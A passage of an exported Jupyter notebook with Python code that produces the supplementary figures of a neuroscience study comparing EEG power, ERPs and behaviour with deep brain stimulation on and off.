ax.set_xticklabels(fits.Model.unique(), ha='left', rotation=-15, fontsize='18')
ax.set_ylabel('Model Deviance (Log Scale)')
sns.despine()
plt.tight_layout()
plt.savefig('plots/manuscript/supplementary/aic.png', dpi=300)
plt.savefig('plots/manuscript/supplementary/aic.svg', dpi=300)
```
### Figure S2: EEfRT Behavior
```
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
from scipy.stats import gamma, mannwhitneyu
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define useful functions.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
def gamma_censor(arr, threshold = 0.005):
'''Fit gamma distribution. Set outlier to NaN.'''
## Estimate fit. Loc fixed to 0.
p = gamma.fit(arr, floc=0)
## Compute likelihood of value.
likelihood = gamma.cdf(arr, *p)
## Censor and return.
return np.where(likelihood < threshold, np.nan,
np.where(likelihood > 1 - threshold, np.nan, arr))
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load data.
df = read_csv('behavior/clean_eefrt_behavior.csv')
## Remove outlier RTs.
df.ChoiceRT = np.where(df.ChoiceRT > 0.3, df.ChoiceRT, np.nan) # Remove RTs faster than 300 ms.
df.ChoiceRT = df.groupby('Subject').ChoiceRT.transform(gamma_censor) # Gamma censoring.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
fig, axes = plt.subplots(1,2,figsize=(15,6))
palette = ['#0571b0','#ca0020']
yvars = ['ChoiceRT', 'ButtonPressRate']
ylabels = ['Response Time (s)','Button Press Rate']
titles = ['EEfRT Choice', 'EEfRT Bar Fill']
for ax, y, ylabel, title in zip(axes, yvars, ylabels, titles):
## Compute Wilcoxon signed-rank test.
U, p = mannwhitneyu(df.loc[df.DBS==0, y], df.loc[df.DBS==1, y],)
## Plot.
sns.barplot('DBS', y, data=df, palette=palette, ax=ax)
## Add Wilcoxon info.
_, y2 = ax.get_ylim()
ax.hlines(y2, 0, 1)
ax.vlines(0, y2 * 0.975, y2)
ax.vlines(1, y2 * 0.975, y2)
ax.text(0.5, y2*1.025, 'U = %0.1f, p = %0.3f' %(U,p), ha='center', fontsize=24)
ax.set(xlabel='', xticklabels=['OFF','ON'], ylim=(0, y2*1.15),
ylabel=ylabel, title=title)
sns.despine()
plt.subplots_adjust(top=0.9, bottom=0.1, left=0.08, right=0.99, wspace=.2)
plt.savefig('plots/manuscript/supplementary/eefrt.png', dpi=180)
plt.savefig('plots/manuscript/supplementary/eefrt.svg', dpi=180)
plt.show()
```
### Figure S4: FCZ ERP
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## File parameters.
model_name = 'revised'
space = 'sensor'
label = 'FCZ'
freq = 15
## Plotting parameters.
contrasts = ['Interference','DBS']
palettes = [ ['#7b3294','#008837'], ['#0571b0','#ca0020'] ]
annotations = [ ['Control', 'Interference'], ['DBS OFF','DBS ON'] ]
ylimits = {'stim':(-5,1), 'resp':(-2.5,2.5)}
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Intialize figure.
fig, axes = plt.subplots(2,2,figsize=(12,9))
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
for n, contrast, colors, legends in zip(range(2), contrasts, palettes, annotations):
for m, analysis in enumerate(['stim', 'resp']):
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load source data.
npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space,analysis,label,freq)))
data = npz['data']
times = npz['times']
## Load cluster results.
f = os.path.join(space, 'results', '%s_%s_timedomain_results.csv' %(model_name, analysis))
clusters = read_csv(f)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
y1, y2 = ylimits[analysis]
for i, color, legend in zip(range(2),colors,legends):
ix, = np.where(info[contrast]==i)
mu = data[ix].mean(axis=0)
se = data[ix].std(axis=0) / np.sqrt(len(ix))
axes[n,m].plot(times, mu, linewidth=3, color=color, label=legend)
axes[n,m].fill_between(times, mu-se, mu+se, color=color, alpha=0.2)
## Plot significant clusters.
for ix in np.where((clusters.Label==label)&(clusters.Freq==freq)&
(clusters.Contrast==contrast)&(clusters.FDR<0.05))[0]:
tmin, tmax = clusters.loc[ix,'Tmin'], clusters.loc[ix,'Tmax']
axes[n,m].fill_between(np.linspace(tmin,tmax,1e3), y1, y2, color='k', alpha=0.2)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Add flourishes.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
for n in range(2):
for m in range(2):
y1, y2 = ylimits[analysis]
## Stimulus-locked edits.
if not m:
## Fix axes.
y1, y2 = -5, 1
xticks = np.array([0.0, 0.4, 0.9, 1.4])
axes[n,m].set(xticks=xticks, xticklabels=xticks - 0.4,
xlim=(-0.25,1.5), ylim=(y1,y2),
ylabel = r'FCz Voltage ($\mu$V)')
## Add markers.
for x,s in zip([0, 0.4, 1.127],['IAPS','MSIT','Resp']):
axes[n,m].text(x+0.02,y1+np.abs(y1*0.05),s,fontsize=22)
axes[n,m].vlines(x,y1,y2,linestyle='--',alpha=0.3)
## Response-locked edits.
else:
## Fix axes.
xticks = np.array([-1.0, -0.5, 0.0, 0.5, 1.0])
axes[n,m].set(xticks=xticks, xlim=(-1.0, 1.0), ylim=(y1, y2))
## Add markers
axes[n,m].text(0.02,y1+np.abs(y1*0.05),'Resp',fontsize=22)
axes[n,m].vlines(0.0,y1,y2,linestyle='--',alpha=0.3)
## Add legends above plot.
axes[n,m].legend(loc=1, handlelength=1.2, handletextpad=0.5,
labelspacing=0.1, borderpad=0)
## Add y-labels.
if n: axes[n,m].set_xlabel('Time (s)')
sns.despine()
plt.subplots_adjust(top=0.97, left = 0.08, right = 0.98,
bottom=0.1, hspace=0.35, wspace=0.1)
plt.savefig('plots/manuscript/supplementary/fcz.png')
plt.savefig('plots/manuscript/supplementary/fcz.svg')
plt.show()
plt.close()
```
### Figure S5
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import DataFrame, read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## I/O parameters
space = 'source'
model_name = 'revised'
contrast = 'DBS'
## Label parameters.
labels = ['racc-lh', 'dacc-lh', 'pcc-lh', 'dmpfc-lh', 'dlpfc_1-lh', 'dlpfc_2-lh',
'dlpfc_3-lh', 'dlpfc_4-lh', 'dlpfc_5-lh', 'dlpfc_6-lh',
'racc-rh', 'dacc-rh', 'pcc-rh', 'dmpfc-rh', 'dlpfc_1-rh', 'dlpfc_2-rh',
'dlpfc_3-rh', 'dlpfc_4-rh', 'dlpfc_5-rh', 'dlpfc_6-rh']
xlabels = ['rACC', 'dACC', 'mCC', 'SFG', 'pMFG 1', 'pMFG 2',
'aMFG 1', 'aMFG 2', 'aIFG', 'pIFG'] * 2
## Define averaging parameters.
baseline = (-0.5, -0.1)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Preallocate space.
analyses = []
freqs = []
rois = []
legend = []
values = []
for analysis in ['stim','resp']:
for label, xlabel in zip(labels,xlabels):
for freq, ffreq in zip(['theta','alpha','beta'],
[r'$\theta$',r'$\alpha$',r'$\beta$']):
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load trial information
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
## Load source data.
npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space,analysis,label,freq)))
data = npz['data']
times = npz['times']
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Compute differences.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Define mask.
if analysis == 'stim': tmin, tmax = 0.4, 0.8
elif analysis == 'resp': tmin, tmax = -0.2, 0.2
## Compute averages within window.
delta = []
for i in range(2):
## Identify DBS on/off trials.
ix, = np.where(info.DBS==i)
## Compute average time course.
mu = data[ix].mean(axis=0)
## Reduce to time of interest.
mu = mu[(times >= tmin)&(times <= tmax)]
delta.append(mu)
## Compute difference.
delta = np.diff(delta, axis=0).squeeze()
## Append information.
analyses += [analysis] * len(delta)
freqs += [ffreq] * len(delta)
rois += [xlabel] * len(delta)
legend += [label] * len(delta)
values += delta.tolist()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Conver to DataFrame.
df = DataFrame([analyses, freqs, rois, legend, values],
index=('Analysis','Freq','ROI','Label','Delta')).T
df['Hemi'] = [s.split('-')[-1] for s in df.Label]
## Plot.
fig, axes = plt.subplots(4,1,figsize=(15,12))
analyses = ['stim','stim','resp','resp']
hemis = ['lh','rh','lh','rh']
ylabels = ['Left Hemisphere', 'Right Hemisphere', 'Left Hemisphere', 'Right Hemisphere']
titles = ['Stimulus-Locked',False,'Response-Locked',False]
for ax, analysis, hemi, ylabel, title in zip(axes, analyses, hemis, ylabels, titles):
## Plot.
ix = np.logical_and(df.Analysis==analysis,df.Hemi==hemi)
sns.barplot('ROI', 'Delta', 'Freq', df[ix], palette=sns.color_palette(n_colors=3), ax=ax)
## Add flouishes.
ax.hlines(0,*ax.get_xlim())
ax.set(xlabel = '', yticks=[0,0.5,1])
ax.set_xticklabels(df.ROI.unique(), fontsize=20, rotation=-15)
ax.set_ylabel(ylabel, fontsize=20)
ax.legend(loc=1, bbox_to_anchor=(1.125,0.9), labelspacing=0, borderpad=0,
handletextpad=0.25)
ax.legend_.set_title('Power (On - Off)', prop = {'size':'x-large'})
if title: ax.set_title(title)
## Draw asterisks.
for ax, analysis, hemi in zip(axes, analyses, hemis):
## Load significant clusters.
info = read_csv('source/results/revised_%s_frequency_results.csv' %analysis)
info = info[np.logical_and(info.Contrast=='DBS', info.FDR<0.05)]
info = info[[True if label.endswith(hemi) else False for label in info.Label]]
info = info[['Label','Freq']].drop_duplicates()
## Iteratively draw asterisks.
for _, row in info.iterrows():
y = df.loc[(df.Analysis==analysis)&(df.Label==row.Label)&
(df.Freq==r'$\%s$' %row.Freq),'Delta'].mean()
x1 = np.argmax(np.in1d(df.loc[df.Hemi==hemi,'Label'].unique(), row.Label))
x2 = np.argmax(np.in1d(['theta','alpha','beta'], row.Freq))
ax.annotate('*', xy=(0,0), xytext=(-0.32 + x1 + 0.28 * x2, y+0.05),
xycoords='data', fontsize=24)
sns.despine()
plt.subplots_adjust(left=0.075, right=0.9, top=0.95, bottom=0.06, hspace=0.5)
plt.savefig('plots/manuscript/supplementary/S5.png', dpi=180)
plt.savefig('plots/manuscript/supplementary/S5.svg', dpi=180)
plt.show()
```
### Figure S6: Out of Task Power
#### PSD of eyes-open resting state
```
import os
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from mne import Epochs, make_fixed_length_events, pick_channels, read_proj, set_log_level
from mne.io import Raw
from mne.time_frequency import psd_multitaper
set_log_level(verbose=False)
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define Parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## I/O parameters.
subjects = ['BRTU', 'CHDR', 'JADE', 'S2']
conds = ['resting_dbsoff_eo', 'resting_dbson_eo']
## Filtering parameters.
l_freq = 0.5
h_freq = 50
l_trans_bandwidth = l_freq / 2.
h_trans_bandwidth = 1.0
filter_length = '20s'
n_jobs = 3
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
root_dir = '../resting/raw/'
PSD = []
for subject in subjects:
s = []
for cond in conds:
## Load data.
raw = Raw('%s/%s_%s_raw.fif' %(root_dir, subject, cond), preload=True)
## Apply projection.
proj = '%s/%s_%s-proj.fif' %(root_dir, subject, cond)
if os.path.isfile(proj): raw.add_proj(read_proj(proj))
else: raw.set_eeg_reference()
raw = raw.apply_proj()
## Filter raw.
raw = raw.filter(l_freq, h_freq, filter_length=filter_length, l_trans_bandwidth=l_trans_bandwidth,
h_trans_bandwidth=h_trans_bandwidth)
## Create epochs.
events = make_fixed_length_events(raw, 1, start=1, stop=61, duration=1)
epochs = Epochs(raw, events, tmin=-0.5, tmax=1, baseline=(-0.5,0))
## Compute PSD
picks = pick_channels(raw.ch_names, ['FZ'])
psd, freqs = psd_multitaper(epochs, fmin=l_freq, fmax=30, picks=picks)
s.append(psd)
PSD.append(s)
## Merge into one array.
PSD = np.array(PSD).squeeze().swapaxes(0,1)
n_cond, n_subj, n_trial, n_freq = PSD.shape
PSD = PSD.reshape(n_cond,n_subj*n_trial,n_freq)
## Plot.
fig, ax = plt.subplots(1,1,figsize=(8,4))
for n, color, label in zip(range(2),['#0571b0','#ca0020'],['DBS OFF','DBS ON']):
mu = np.median(PSD[n], axis=0)
mu /= mu.sum()
ax.plot(freqs, mu, lw=3, color=color, label=label)
## Flourishes.
ax.vlines([4,8], 0, 0.15, linestyle='--', alpha=0.5)
ax.set(xlim=(0.5,30), xticks=(0.5,10,20,30), xticklabels=(0,10,20,30), xlabel='Frequency (Hz)',
ylim=(0,0.12), ylabel='Normalized PSD');
ax.legend(loc=0, borderpad=0, labelspacing=0)
sns.despine()
plt.tight_layout()
plt.savefig('plots/manuscript/supplementary/S6b.png')
plt.savefig('plots/manuscript/supplementary/S6b.svg')
from scipy.stats import mannwhitneyu
mask = np.logical_and(freqs >= 4, freqs <= 8)
psd = PSD[...,mask].mean(axis=-1)
psd = np.log10(psd)
mannwhitneyu(*psd)
```
#### Power Timecourses of all bands in FZ
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import DataFrame, read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## File parameters.
model_name = 'revised'
space = 'sensor'
label = 'FZ'
baseline = (-0.5, -0.1)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load trial information.
info = read_csv('%s/afMSIT_sensor_info.csv' %space)
cdict = dict(DBS = ['#0571b0','#ca0020'], Interference = ['#7b3294','#008837'])
ldict = dict(DBS = ['DBS OFF','DBS ON'], Interference = ['Control', 'Interference'])
## Initialize figure.
fig = plt.figure(figsize=(18,12))
for i, analysis in enumerate(['stim','resp']):
results = read_csv('sensor/results/revised_%s_frequency_results.csv' %analysis)
for j, freq in enumerate(['theta','alpha','beta']):
## Load data.
npz = np.load('%s/afMSIT_%s_%s_%s_%s.npz' %(space,space,analysis,label,freq))
data = npz['data']
times = npz['times']
for k, contrast in enumerate(['DBS', 'Interference']):
## Initialize canvas.
ax = plt.subplot2grid((4,3),(k+i*2,j))
## Plot power.
for n, color, legend in zip(range(2),cdict[contrast],ldict[contrast]):
## Identify indices per condition of contrast.
ix, = np.where(info[contrast]==n)
## Compute mean and standard error.
mu = data[ix].mean(axis=0)
## If stimulus-locked, baseline subtract.
if analysis == 'stim': mu -= mu[(times >= baseline[0])&(times <= baseline[1])].mean()
se = data[ix].std(axis=0) / np.sqrt(len(ix))
## Plot.
ax.plot(times, mu, linewidth=3, color=color, label=legend)
ax.fill_between(times, mu-se, mu+se, color=color, alpha=0.2)
## Plot significant clusters.
for _, row in results.loc[(results.Contrast==contrast)&(results.Label==label)&
(results.Freq==freq)&(results.FDR<0.05),
('Tmin','Tmax')].iterrows():
ax.fill_between(np.linspace(row.Tmin,row.Tmax,1e3), -10, 10, color='k', alpha=0.1)
## Clean-up.
if analysis == 'stim':
## Fix timing.
ax.set(xlim=(-0.25,1.5), xticks=[0.0, 0.4, 0.9, 1.4],
xticklabels=[-0.4, 0.0, 0.5, 1.0], ylim=(-1.5,2), yticks=[-1, 0, 1, 2])
## Add time markers.
ax.vlines([0, 0.4, 1.127],*ax.get_ylim(),linestyle='--',alpha=0.3)
ax.hlines(0, *ax.get_xlim(), linestyle='--',alpha=0.3)
elif analysis == 'resp':
## Fix timing
ax.set(xlim=(-1.0,1.0), xticks=np.arange(-1,1.1,0.5), ylim=(-2.5,1.5), yticks=[-2,-1,0,1])
## Add time markers.
ax.vlines(0.0,*ax.get_ylim(),linestyle='--',alpha=0.3)
ax.hlines(0, *ax.get_xlim(), linestyle='--',alpha=0.3)
## Special cases.
if j: ax.set(yticklabels=[])
if j == 2 and not k: ax.legend(loc=7, bbox_to_anchor=(1.53,0.5), labelspacing=0, handlelength=1.5)
if j == 2 and k: ax.legend(loc=7, bbox_to_anchor=(1.6,0.5), labelspacing=0, handlelength=1.5)
if not k: ax.set(xticklabels=[])
if not i and not k: ax.set_title(r'$\%s$-power' %freq, fontsize=36)
## Additional annotations.
ax.annotate('Stimulus-Locked', xy=(0,0), xytext=(0.01, 0.75), xycoords='figure fraction',
rotation=90, fontsize=36, va='center')
ax.annotate('Response-Locked', xy=(0,0), xytext=(0.01, 0.25), xycoords='figure fraction',
rotation=90, fontsize=36, va='center')
sns.despine()
plt.subplots_adjust(left=0.07, right=0.85, top=0.95, bottom=0.05, hspace=0.175, wspace=0.15)
plt.savefig('plots/manuscript/supplementary/S6a.png')
plt.savefig('plots/manuscript/supplementary/S6a.svg')
```
### Figure S7: Significant Alpha/Beta clusters
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load data.
f = 'source/results/revised_stim_frequency_results.csv'
df = read_csv(f)
## Limit data.
df = df[df.FDR<0.05]
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Defining plotting info.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Define label information.
labels = ['racc-lh', 'dacc-lh', 'pcc-lh', 'dmpfc-lh', 'dlpfc_1-lh', 'dlpfc_2-lh',
'dlpfc_3-lh', 'dlpfc_4-lh', 'dlpfc_5-lh', 'dlpfc_6-lh',
'racc-rh', 'dacc-rh', 'pcc-rh', 'dmpfc-rh', 'dlpfc_1-rh', 'dlpfc_2-rh',
'dlpfc_3-rh', 'dlpfc_4-rh', 'dlpfc_5-rh', 'dlpfc_6-rh']
rois = ['rACC', 'dACC', 'mCC', 'SFG', 'pMFG 1', 'pMFG 2',
'aMFG 1', 'aMFG 2', 'aIFG', 'pIFG'] * 2
## Define plotting features.
conds = ['DBS','Interference']
colors = ['#ca0020','#008837']
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Initialize figure.
fig, axes = plt.subplots(1,2,figsize=(15,12),sharex=True, sharey=True)
for ax, freq in zip(axes,['alpha','beta']):
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting Clusters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Reduce DataFrame to frequency of interest.
copy = df[df.Freq==freq].copy()
## Plot timings.
for x,s in zip([0, 0.4, 1.127],['IAPS','MSIT','Resp']):
ax.text(x+0.01,-0.6,s,fontsize=20)
ax.vlines(x, -1, len(labels), linewidth=2.5, linestyle='--',alpha=0.2)
## Plot clusters.
for n, label in enumerate(labels[::-1]):
for m, contrast in enumerate(conds):
## Extract clusters.
ix = np.logical_and(copy.Contrast==contrast, copy.Label==label)
clusters = copy.loc[ix,['Tmin','Tmax']]
if not len(clusters): continue
## Plot clusters.
y = n + m * 0.5
for cluster in clusters.as_matrix():
ax.hlines(y+0.25, cluster.min(), cluster.max(), color=colors[m], lw=12)
## Fix x-axis.
xticks = np.array([0.0, 0.4, 0.9, 1.4])
ax.set(xticks=xticks, xticklabels=xticks-0.4, xlim=(-0.25,1.5), xlabel='Time (s)')
## Set title
ax.set_title(r'$\%s$-Power' %freq)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Add flourishes.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Add legend.
for label, color in zip(conds,colors):
axes[1].plot([],[],lw=10,color=color,label=label,alpha=0.7)
axes[1].legend(loc=7, bbox_to_anchor=(1.5,0.5), handlelength=1.25, borderaxespad=0)
## Fix y-axis.
ax.set(yticks=np.arange(len(rois))+0.5, yticklabels=rois[::-1], ylim=(-0.7,len(rois)))
## Add dendrograms.
def dendrogram(ax, x, y1, y2, text):
## Parameters
lw = 2.0
alpha = 0.2
## Drawing
ax.annotate('', (x, y1), xycoords='axes fraction', xytext=(x,y2),
arrowprops=dict(arrowstyle='-', color='k', linewidth=lw, alpha=alpha))
ax.annotate('', (x*1.02,y1), xycoords='axes fraction', xytext=(-1e-3,y1),
arrowprops=dict(arrowstyle='-', color='k', linewidth=lw, alpha=alpha))
ax.annotate('', (x*1.02,y2), xycoords='axes fraction', xytext=(-1e-3,y2),
arrowprops=dict(arrowstyle='-', color='k', linewidth=lw, alpha=alpha))
ax.annotate(text, (0,0), xycoords='axes fraction', xytext=(x*1.4, np.mean([y1,y2])),
rotation=90, fontsize=30, va='center')
dendrogram(axes[0], -0.3, 0.025, 0.51, 'Right Hemisphere')
dendrogram(axes[0], -0.3, 0.515, 1, 'Left Hemisphere')
sns.despine()
plt.subplots_adjust(left=0.15, right=0.85, top=0.95, bottom=0.1, wspace=0.225)
plt.savefig('plots/manuscript/supplementary/S7.png', dpi=180)
plt.savefig('plots/manuscript/supplementary/S7.svg', dpi=180)
plt.show()
```
### Figure S8
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import DataFrame, concat, read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## I/O parameters
space = 'source'
model_name = 'revised'
contrast = 'DBS'
freq = 'theta'
## Label parameters.
labels = ['racc-lh', 'dacc-lh', 'pcc-lh', 'dmpfc-lh', 'dlpfc_1-lh', 'dlpfc_2-lh',
'dlpfc_3-lh', 'dlpfc_4-lh', 'dlpfc_5-lh', 'dlpfc_6-lh']
xlabels = ['rACC', 'dACC', 'mCC', 'SFG', 'pMFG 1', 'pMFG 2', 'aMFG 1', 'aMFG 2', 'aIFG', 'pIFG']
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load trial information
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
n_subj, = info.Subject.unique().shape
n_cond, = info.DBS.unique().shape
corr = []
for analysis in ['stim','resp']:
## Define mask.
if analysis == 'stim': tmin, tmax = 0.4, 0.8
else: tmin, tmax = -0.2, 0.2
df = []
for label, xlabel in zip(labels,xlabels):
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load source data.
npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space,analysis,label,freq)))
data = npz['data']
times = npz['times']
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Compute differences.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Preallocate space.
mu = np.zeros((n_subj,n_cond))
for n, subject in enumerate(info.Subject.unique()):
for m in [0,1]:
## Locate trials.
ix = np.logical_and(info.Subject==subject, info.DBS==m)
## Compute average.
mu[n,m] = data[ix][:,(times >= tmin)&(times <= tmax)].mean()
## Convert to DataFrame.
mu = DataFrame(mu, columns=('DBS_off','DBS_on'), index=info.Subject.unique())
## Compute DBSon - DBSoff power differential.
mu['DBS_diff'] = mu.DBS_on - mu.DBS_off
## Compute DBSon - DBSoff RT differential.
mu['RT_off'] = info.groupby(['DBS','Subject']).RT.mean()[0]
mu['RT_on'] = info.groupby(['DBS','Subject']).RT.mean()[1]
mu['RT_diff'] = mu.RT_on - mu.RT_off
## Store label information and label.
mu['Label'] = label
mu['ROI'] = xlabel
df.append(mu)
## Concatenate DataFrames.
df = concat(df)
## Compute correlations.
gb = df.groupby('ROI')[['DBS_diff','RT_diff']].corr().reset_index()
gb = gb[gb.level_1=='DBS_diff'].drop(['level_1','DBS_diff'], 1)
gb['Analysis'] = analysis
corr.append(gb)
## Concatenate.
corr = concat(corr)
corr.Analysis = np.where(corr.Analysis=='stim','Stimulus-locked','Response-locked')
## Plot.
fig, ax = plt.subplots(1,1,figsize=(12,4))
sns.barplot(x='ROI', y='RT_diff', hue='Analysis', data=corr,
order=xlabels, ax=ax)
ax.hlines(0,-0.5,len(xlabels)+0.5)
ax.legend(loc=7, bbox_to_anchor=(1.3,0.5), fontsize=16, handletextpad=0.2)
ax.set(xlabel='', ylabel="Pearson's $r$", title='DBS x RT Correlation')
ax.set_xticklabels(xlabels, fontsize=16, rotation=-30)
sns.despine()
plt.subplots_adjust(left=0.12, right=0.8, top=0.85, bottom=0.17)
plt.savefig('plots/manuscript/supplementary/S8.png', dpi=180)
plt.savefig('plots/manuscript/supplementary/S8.svg', dpi=180)
```
### S9: Lausanne Mapping
#### Plot Labels
```
import os
from surfer import Brain
from pandas import read_csv
%matplotlib qt4
## Initialize brain.
brain = Brain('fscopy', 'split', 'inflated', views = ['lateral','medial'],
size = (1200,800), subjects_dir='../freesurfs')
## Load mapping info.
mapping = read_csv('../freesurfs/fscopy/label/april2016/mapping.csv')
emote_label = ''
for _, row in mapping.iterrows():
## Load EMOTE label.
if not row['EMOTE Label'] == emote_label:
emote_label = row['EMOTE Label']
brain.add_label('../freesurfs/fscopy/label/april2016/%s.label' %emote_label,
hemi='lh' if emote_label.endswith('lh') else 'rh',
borders = True, color = row['Color'])
```
#### Find number of vertices
```
import os
import numpy as np
from mne import read_label, read_source_spaces
from pandas import read_csv
## Load mapping info.
label_dir = '../freesurfs/fscopy/label/april2016'
mapping = read_csv('%s/mapping.csv' %label_dir)
## Load source space.
src = read_source_spaces('../freesurfs/fscopy/bem/fscopy-oct-6p-src.fif', verbose=False)
## Locate labels.
labels = [f for f in os.listdir(label_dir) if f.endswith('label')]
## Iteratively identify number of labels in source space.
mapping['Vertices'] = 0
for label in labels:
## Load label.
label = read_label('%s/%s' %(label_dir,label))
## Compute number of vertices in source space.
n_vert = np.in1d(src[0 if label.hemi == 'lh' else 1]['vertno'], label.vertices).sum()
## Store in DataFrame.
mapping.loc[mapping['EMOTE Label']==label.name, 'Vertices'] = n_vert
mapping.to_csv('%s/mapping.csv' %label_dir, index=False)
```
| github_jupyter |
